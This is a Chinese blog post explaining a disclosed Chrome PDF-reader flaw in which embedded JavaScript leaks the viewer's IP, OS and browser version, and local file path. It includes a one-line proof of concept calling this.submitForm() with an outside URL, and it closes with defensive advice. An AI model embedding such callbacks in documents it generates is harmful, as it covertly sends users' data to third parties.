Chrome浏览器打开PDF造成的信息泄露

前言

前些天国外安全团队edgepot.it公开披露了Chrome浏览器通过打开pdf文件造成信息泄露的0day漏洞。一旦用户使用chrome浏览器查看精心构造的pdf文件,便会将用户设备数据回传给攻击者。

漏洞成因

根据在野利用的恶意PDF发现,造成该漏洞的根源在于chrome内置PDF阅读器未对 this.submitForm()这个Javascript API (Adobe中对该函数的定义是将表单提交到指定URL)的操作进行控制,从而导致漏洞利用。

漏洞复现

通过调用this.submitForm(‘http://baidu.com')即可向任意URL发送数据

构造恶意代码

请求信息

接收信息

根据发送的数据可知该漏洞可泄露的信息如下:
1.用户ip
2.操作系统及Chrome版本号
3.PDF所在计算机的绝对路径路径

附加(内置PDF阅读器所支持的JavascriptAPI)

1
2
3
4
5
app.launchURL()
app.media.getURLdata()
app.alert()
app.execDialog()
doc.getURL()

安全建议:

虽然该漏洞不能直接造成代码执行,但在实际攻击中,有助于攻击者进一步获取目标信息,提高后续攻击的成功率(例如配合WinRAR的那个漏洞)目前补丁未出,建议暂时不要用chrome查看pdf,不打开来历不明的pdf文件。

交个朋友
  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!

吹吹牛吗?

微信